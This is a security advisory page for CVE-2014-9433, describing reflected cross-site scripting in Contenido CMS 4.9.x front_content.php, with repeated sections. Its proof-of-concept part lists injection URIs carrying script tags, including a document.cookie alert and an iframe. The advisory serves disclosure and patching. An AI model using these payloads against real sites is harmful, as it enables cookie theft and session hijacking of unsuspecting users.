Contenido CMS 'front_content.php' Multiple Cross Site Scripting Vulnerabilities
BID:71809
Info
Contenido CMS 'front_content.php' Multiple Cross Site Scripting Vulnerabilities
| Bugtraq ID: | 71809 |
| Class: | Input Validation Error |
| CVE: |
CVE-2014-9433 |
| Remote: | Yes |
| Local: | No |
| Published: | Dec 24 2014 12:00AM |
| Updated: | Jan 12 2015 01:01AM |
| Credit: | Steffen Rösemann |
| Vulnerable: | |
| Not Vulnerable: | |
Discussion
Contenido CMS 'front_content.php' Multiple Cross Site Scripting Vulnerabilities
Contenido CMS is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
Contenido CMS 4.9.x through 4.9.5 are vulnerable.
Contenido CMS is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
Contenido CMS 4.9.x through 4.9.5 are vulnerable.
Exploit / POC
Contenido CMS 'front_content.php' Multiple Cross Site Scripting Vulnerabilities
Attackers can exploit these issues by enticing an unsuspecting victim to follow a malicious URI.
The following example URIs are available:
http://www.example.com/cms/front_content.php?idcat=41&lang=1<script>alert("XSS")</script>
http://www.example.com/cms/front_content.php?idcat=41<iframe src="some_remote_src" height="200" width="200" ></iframe>&lang=1
http://www.example.com/cms/front_content.php?idart=32<script>alert(document.cookie)</script>
Attackers can exploit these issues by enticing an unsuspecting victim to follow a malicious URI.
The following example URIs are available:
http://www.example.com/cms/front_content.php?idcat=41&lang=1<script>alert("XSS")</script>
http://www.example.com/cms/front_content.php?idcat=41<iframe src="some_remote_src" height="200" width="200" ></iframe>&lang=1
http://www.example.com/cms/front_content.php?idart=32<script>alert(document.cookie)</script>
Solution / Fix
Contenido CMS 'front_content.php' Multiple Cross Site Scripting Vulnerabilities
Solution:
Updates are available. Please see the references or vendor advisory for more information.
Solution:
Updates are available. Please see the references or vendor advisory for more information.
References
Contenido CMS 'front_content.php' Multiple Cross Site Scripting Vulnerabilities
References:
References:
- Vendor Homepage (Contenido)